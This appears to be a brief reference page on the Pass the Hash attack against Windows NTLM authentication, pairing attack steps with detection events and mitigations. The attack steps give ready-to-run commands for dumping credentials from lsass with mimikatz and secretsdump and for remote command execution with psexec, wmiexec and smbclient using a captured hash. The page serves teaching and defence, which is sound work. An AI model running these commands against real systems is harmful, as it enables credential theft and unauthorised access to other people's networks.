what is it?
Pass the Hash (PtH) is a technique that uses a captured NTLM hash to authenticate as a user without knowing their plaintext password. Because NTLM authentication uses the hash directly as a credential, an attacker with a valid hash can authenticate to any service that accepts NTLM — SMB, WMI, RDP (in some configs), and more.
requirements
- A captured NTLM hash (from mimikatz, secretsdump, or similar)
- Network access to the target
- Target must accept NTLM authentication (most Windows environments do)
attack steps
1. obtain a hash
1# dump from lsass on a compromised host
2mimikatz # sekurlsa::logonpasswords
3
4# remote dump via impacket
5secretsdump.py domain/user:[email protected]
2. authenticate with the hash
1# psexec with hash
2psexec.py -hashes :ntlmhash domain/[email protected]
3
4# wmiexec
5wmiexec.py -hashes :ntlmhash domain/[email protected]
6
7# smbclient
8smbclient.py -hashes :ntlmhash domain/[email protected]
detection
- Event ID 4624 logon type 3 (network) with NTLM authentication where Kerberos would be expected
- Mismatched workstation names or unusual source IPs for privileged accounts
mitigation
- Enable Protected Users security group — prevents NTLM auth for member accounts
- Disable NTLM where possible via GPO (
Network security: Restrict NTLM) - Use Credential Guard to protect lsass from memory reads
- Enforce tiered administration to limit where privileged hashes are cached